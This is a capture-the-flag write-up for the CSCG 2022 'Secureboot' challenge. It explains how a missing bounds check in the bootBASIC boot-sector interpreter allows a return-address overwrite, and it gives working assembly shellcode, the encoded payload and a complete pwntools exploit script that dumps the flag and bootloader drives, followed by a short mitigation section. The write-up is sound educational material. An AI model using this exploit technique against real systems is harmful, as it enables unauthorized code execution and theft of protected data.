CSCG: Secureboot

This is my second writeup for the Cybersecurity Challenge Germany (CSCG) in 2022.

Category: Pwn

Flag: CSCG{cyber_cyber_hax_hax!11!!1}

Writeup

There are two versions of the bootloader, one with a test key and one with a production key. This challenge has three stages,

first you need to obtain the test bootloader image

then you have to reverse engineer it and sign your own image with the test key

at the end you have to sign the image with the production key to prove that you are l33t

The flag for each stage is on an attached drive. Details on the deployment can be found in the Dockerfile.

Example input:

[…]

I have also test-signed 4 programs. Tetros is from https://github.com/daniel-e/tetros and the other three are from https://github.com/nanochess.

Btw. the sha256sum of the test bootloader image is: […].

Exploring the Challenge

The first task of the challenge was to figure out what to do. The challenge consists of three parts. To solve the first part, we need to obtain the test bootloader image, as the description tells us.

Downloading the challenge files, we get a script called server.py as well as a Dockerfile. The script starts a server that asks a few questions and then launches qemu, redirecting stdin, stdout and stderr to it. It gives qemu three drives:

A bootloader, either bootloader_test or bootloader_prod (this is the boot medium)
A 520-byte image that we supply (512-byte Master Boot Record + 8-byte signature)
The flag
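To make the layout of the second drive concrete, here is a minimal sketch that splits a 520-byte image into its two parts. The names split_image and has_boot_marker are hypothetical, and placing the signature after the 512-byte sector is an assumption based on the order given above. The 0x55 0xAA marker at offset 510 is the standard MBR boot signature and is not taken from server.py.

```python
MBR_SIZE = 512  # size of the Master Boot Record
SIG_SIZE = 8    # size of the appended signature


def split_image(image):
    """Split a 520-byte image into (mbr, signature).

    Assumes the signature directly follows the 512-byte sector.
    """
    if len(image) != MBR_SIZE + SIG_SIZE:
        raise ValueError("expected %d bytes, got %d" % (MBR_SIZE + SIG_SIZE, len(image)))
    return image[:MBR_SIZE], image[MBR_SIZE:]


def has_boot_marker(mbr):
    """Check for the standard 0x55 0xAA marker in the last two bytes of the sector."""
    return mbr[510:512] == b"\x55\xaa"
```

The marker occupies the last two bytes of the sector, which leaves 510 bytes for the actual boot code.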

For this part of the challenge, the emulator boots the test bootloader, which verifies the signature of the image we supply and then hands control to it. Our task is to take one of the four test-signed bootloaders and use it to dump bootloader_test as well as the flag. To avoid making this task unnecessarily hard, we need to choose our bootloader wisely. We have the following options:

Tetros [1]: This bootloader lets a user play Tetris.
Lights [2]: This bootloader lets a user play Lights, a game where the computer plays a sequence and the player has to remember it, while the sequence gets longer every turn.
Fbird [3]: This bootloader lets a user play Flappy Bird.
bootBASIC [4]: This bootloader contains a BASIC interpreter.

After looking at all the available bootloaders, I concluded that the bootBASIC image is probably the easiest to exploit, since it contains a lot of string handling code, has variables, and needs to store the code that corresponds to every line number (like 5 print "Hello World").

Overwriting the Return Address

Inspecting the source code, we find that the interpreter performs almost no bounds checks (it needs to fit into 510 bytes!). The stack is at address 0xff00 while the program is stored at 0x8000. Therefore, we can in theory overwrite a return address on the stack to execute our own code.

My first attempt to overwrite the return address was to put in a very long line of text, approximately 0x7f00 chars. Since qemu drops keypresses when typing too fast and the server has a 10-minute timeout, I could not overwrite the stack in time. Therefore, I needed to find a smarter way to overwrite the stack.

Luckily, bootBASIC stores each line of the BASIC program at a certain offset from 0x8000, so entering 5 print "Hello World" will store print "Hello World" at address 0x8000+5*20. Using gdb, I determined the return address of the input_line call to be stored between 0xfef6 and 0xff00. Using a line like 1625 <addr><addr><addr>...<addr> we can overwrite the return address.
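The choice of line number 1625 follows from the address formula above. The sketch below works through the arithmetic. The base address and the 20-byte slot size come from the text, the helper names are hypothetical, and it assumes that each padding character typed after the line number occupies one byte of the slot.

```python
PROGRAM_BASE = 0x8000  # start of the stored BASIC program (from the text above)
LINE_SIZE = 20         # bytes reserved per line number (from the text above)


def line_address(line_number):
    """Address at which the text of the given BASIC line is stored."""
    return PROGRAM_BASE + line_number * LINE_SIZE


def line_for_target(target):
    """Return (line_number, padding) so that the byte after the padding lands on target."""
    line_number = (target - PROGRAM_BASE) // LINE_SIZE
    padding = target - line_address(line_number)
    return line_number, padding


if __name__ == "__main__":
    print(hex(line_address(1625)))            # slot of line 1625
    print(line_for_target(0xfef6))            # line number and padding for the stack target
```

Line 1625 starts at 0xfef4, so two padding bytes are needed before the first address lands on 0xfef6.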

Which characters does the bootloader accept?

We need to make sure that the two characters corresponding to the little-endian representation of the return address are actually saved in memory when typed in via qemu. To find out which characters are accepted by qemu, I wrote a small script that types in every character. Using gdb, I read out the memory of the machine to see which characters are actually stored:

from pwn import *

if __name__ == '__main__':
    # -s opens a gdb stub on port 1234, -S halts the CPU until gdb continues
    p = process(['qemu-system-i386', '-drive', 'format=raw,file=basic_no_sig', '-nographic', '-s', '-S'])
    for i in range(256):
        if i == 0x0d:  # skip \r, it would end the current line
            continue
        p.send(bytes([i]))
        print(p.read())
    p.interactive()

We skip \r since it ends the line, after which further input overwrites the start of the buffer. Inspecting the memory of the bootloader after executing the script, we see that 0x0, 0x1, 0x2, 0x8 and 0xd cannot be used (0x8 is the backspace character and 0xd is the carriage return). Also, we can only use ASCII characters.
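These restrictions can be turned into a small check for candidate return addresses. This is a sketch with hypothetical helper names. The forbidden set is the one listed above, and "ASCII" is interpreted as byte values below 0x80.

```python
FORBIDDEN = {0x00, 0x01, 0x02, 0x08, 0x0d}  # bytes that were not stored in memory


def is_typeable(byte):
    """True if the byte is ASCII and not one of the rejected control characters."""
    return byte < 0x80 and byte not in FORBIDDEN


def address_is_typeable(address):
    """True if both bytes of the little-endian 16-bit address can be typed in."""
    return all(is_typeable(b) for b in address.to_bytes(2, "little"))
```

For example, an address ending in 0x08 fails the check because the low byte would be interpreted as a backspace.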

Shellcode

Since the bootloader is running in real mode with all segment registers set to 0, all data is executable. Therefore, we can write shellcode to memory and execute it. The easiest way for me was to use the bootBASIC variable feature: it allows storing 26 16-bit unsigned integers, each variable corresponding to a letter of the alphabet. The plan is to encode the shellcode into variable assignments and jump to the address of the first variable used. Because of the character restrictions we discovered above, both bytes of the jump address must be typeable, so the first letter I used was 'h'. We have to jump to address 0x7e10, corresponding to '\x10~', which is stored as-is in memory.
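The space available for shellcode follows from this layout. The sketch below assumes that the variables are stored as consecutive 16-bit slots in alphabetical order, anchored at the address of 'h' given above. The helper names are hypothetical.

```python
FIRST_VAR = "h"
FIRST_VAR_ADDRESS = 0x7e10  # address of 'h' (from the text above)
VAR_SIZE = 2                # each variable holds 16 bits


def var_address(letter):
    """Address of a variable, assuming consecutive 2-byte slots in alphabetical order."""
    return FIRST_VAR_ADDRESS + VAR_SIZE * (ord(letter) - ord(FIRST_VAR))


def shellcode_capacity(first="h", last="z"):
    """Number of shellcode bytes that fit into the variables first..last."""
    return VAR_SIZE * (ord(last) - ord(first) + 1)
```

Under these assumptions the variables 'h' through 'z' provide 38 bytes, so the shellcode has to be kept very small.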

The shellcode dumps the first sector of a hard drive. It uses int 0x13 to read the sector into memory at 0x8000 and then calls the function output_number from bootBASIC for each byte:

org 0x7e10
    mov ax,0x0201 ; read 1 sector
    mov bx,0x8000 ; buffer address
    mov cx,0x1 ; cylinder 0, sector 1
    mov dx,{drive_number} ; drive {drive_number}, head 0
    int 0x13
    mov si,0x8000
loop_iter:
    xor ax, ax
    mov al,[si]
    call 0x7c00 + 0x11c ; output_number
    mov al,' '
    call 0x7c00 + 0x1a7 ; output
    inc si
    cmp si, 0x8200 ; read 512 bytes
    jne loop_iter
loop_end:
    jmp loop_end

In our script, we replace drive_number with the BIOS drive number, so 0x80 for the bootloader and 0x82 for the flag (0x81 is the image we supplied ourselves).
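The value loaded into dx combines the head number (high byte) and the drive number (low byte). A minimal sketch follows, assuming that qemu assigns BIOS hard disk numbers in the order of the drive list given earlier (bootloader, our image, flag). The helper names are hypothetical.

```python
def bios_drive_number(index):
    """BIOS number of the index-th hard disk; hard disks are numbered from 0x80."""
    return 0x80 + index


def dx_for(drive_index, head=0):
    """Value for dx before int 0x13: dh holds the head, dl holds the drive number."""
    return (head << 8) | bios_drive_number(drive_index)


if __name__ == "__main__":
    for index, name in enumerate(["bootloader", "our image", "flag"]):
        print(name, hex(dx_for(index)))
```

For the third drive this gives 0x82, which is 130 in decimal.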

We assemble the shellcode and encode it into variables, so the payload for drive 0x82 looks like this:

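b'h=440\ri=47874\rj=32768\rk=441\rl=47616\rm=130\rn=5069\ro=190\rp=12672\rq=35520\rr=59396\rs=65268\rt=8368\ru=31464\rv=18175\rw=65153\rx=33280\ry=60789\rz=65259\r1625  \x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\r'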
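To double-check such a payload, the variable assignments can be decoded back into the bytes they place in memory. The helper below is a hypothetical sketch. It assumes that the assignments appear in alphabetical order without gaps, and it skips every entry that is not of the form letter=number.

```python
def decode_assignments(payload):
    """Rebuild the shellcode bytes from '<letter>=<number>' entries separated by \\r."""
    out = bytearray()
    for entry in payload.split(b"\r"):
        name, sep, value = entry.partition(b"=")
        if not sep or len(name) != 1 or not value.isdigit():
            continue  # not a variable assignment, e.g. the final BASIC line
        out += int(value).to_bytes(2, "little")  # variables are 16-bit little-endian
    return bytes(out)


if __name__ == "__main__":
    print(decode_assignments(b"h=440\ri=47874\rj=32768\r").hex())
```

The first three decoded bytes are b8 01 02, which is the encoding of mov ax,0x0201.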

We get the following output:

$ python solve1.py
[+] Opening connection to 288d6d81b8db6f3e4f732be0-secureboot.challenge.master.cscg.live on port 31337: Done
b'h=440\ri=47874\rj=32768\rk=441\rl=47616\rm=130\rn=5069\ro=190\rp=12672\rq=35520\rr=59396\rs=65268\rt=8368\ru=31464\rv=18175\rw=65153\rx=33280\ry=60789\rz=65259\r1625  \x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\r'
[*] CSCG{cyber_cyber_hax_hax!11!!1}
[*] Closed connection to 288d6d81b8db6f3e4f732be0-secureboot.challenge.master.cscg.live port 31337

We get the flag CSCG{cyber_cyber_hax_hax!11!!1}. Using drive number 0x80, we also get the bootloader with the checksum specified in the challenge description. Final script:

import os
import subprocess

from pwn import *

def get_shellcode(drive_number):
    asm = f'''
org 0x7e10
    mov ax,0x0201 ; read 1 sector
    mov bx,0x8000 ; buffer address
    mov cx,0x1 ; cylinder 0, sector 1
    mov dx,{drive_number} ; drive {drive_number}, head 0
    int 0x13
    mov si,0x8000
loop_iter:
    xor ax, ax
    mov al,[si]
    call 0x7c00 + 0x11c ; output_number
    mov al,' '
    call 0x7c00 + 0x1a7 ; output
    inc si
    cmp si, 0x8200 ; read 512 bytes
    jne loop_iter
loop_end:
    jmp loop_end
    '''

    with open('payload.asm', 'w') as f:
        f.write(asm)
    # nasm defaults to flat binary output and writes it to 'payload'
    subprocess.run(['nasm', 'payload.asm'], check=True)

    with open('payload', 'rb') as f:
        payload_data = f.read()

    os.unlink('payload.asm')
    os.unlink('payload')
    return payload_data


def encode_shellcode(shellcode):
    """
    encode our shellcode as variables, starting at 'h'. every variable can hold 16 bits.
    """
    i = 0
    res = ''
    while i < len(shellcode):
        number = int.from_bytes(shellcode[i:i+2], 'little')
        i += 2
        res += chr(ord('h')+(i//2-1))+'='+str(number)+"\r"
    return res

def exploit_basic(p, drive_number=0x80):
    payload = encode_shellcode(get_shellcode(drive_number)).encode()
    payload += b"1625  " + p16(0x7e10) * 20 + b"\r" # two spaces for alignment, offset for 'h' as first variable
    print(payload)

    p.recvuntil(b'>')
    # send one byte at a time and read the response before sending the next one,
    # since qemu drops keypresses that arrive too fast
    for byte in payload:
        p.send(bytes([byte]))
        p.read()
    p.recvuntil(b'\n')

    # the shellcode prints 512 decimal numbers, each followed by a space
    data = []
    for _ in range(512):
        data.append(int(p.recvuntil(b' ').strip().replace(b'\r\r\n', b'').decode()))

    return bytes(data)

def setup_challenge(p, second_stage, prod=False, nographic=True):
    p.send((b'1' if prod else b'0') + b'\n' + (b'1' if nographic else b'0') + b'\n')
    p.sendline(second_stage.hex().encode() + b'EOF')

if __name__ == '__main__':
    local = False
    if local:
        p = process(['qemu-system-i386', '-drive', 'format=raw,file=basic_no_sig', '-drive', 'format=raw,file=test.txt', '-nographic'])
    else:
        p = remote('288d6d81b8db6f3e4f732be0-secureboot.challenge.master.cscg.live', 31337, ssl=True)
    with open('testsigned_images/basic-test_signed', 'rb') as f:
        data = f.read()
    setup_challenge(p, data, prod=False, nographic=True)
    data = exploit_basic(p, drive_number=0x82)
    log.info(data.rstrip(b'\x00').decode(errors='replace'))  # data is bytes, so strip with a bytes argument
    with open('dumped.bin', 'wb') as f:
        f.write(data)

Mitigation

Our attack vector was the missing bounds checks in the bootloader which allowed us to overwrite the return address on the stack. Because the data and code segments are not separated, we were able to execute shellcode.

As always with binary exploitation challenges, the primary mitigation is to check bounds before all operations to avoid buffer overflows. This is even more important in kernel modules and bootloaders, since code runs with higher privileges there. A partial mitigation would be to separate code and data segments, which would increase the difficulty of exploitation.
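As an illustration of such a bounds check, the following sketch models the line storage in Python and rejects any line whose slot would leave the program area. It is not bootBASIC code. PROGRAM_LIMIT is a hypothetical boundary chosen to lie below the stack, and the function name is made up for this example.

```python
PROGRAM_BASE = 0x8000   # start of the stored BASIC program
LINE_SIZE = 20          # bytes reserved per line number
PROGRAM_LIMIT = 0xfe00  # hypothetical end of the program area, below the stack


def checked_line_address(line_number, text_length):
    """Return the slot address for a line, or raise if the write would be out of bounds."""
    if line_number < 0:
        raise ValueError("negative line number")
    if text_length > LINE_SIZE:
        raise ValueError("line does not fit into its slot")
    start = PROGRAM_BASE + line_number * LINE_SIZE
    if start + LINE_SIZE > PROGRAM_LIMIT:
        raise ValueError("line number outside the program area")
    return start
```

With a check like this, line 1625 and the overlong address list from the exploit would both be rejected before anything is written near the stack.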

Sources

[1] https://github.com/daniel-e/tetros

[2] https://github.com/nanochess/lights

[3] https://github.com/nanochess/fbird

[4] https://github.com/nanochess/bootBASIC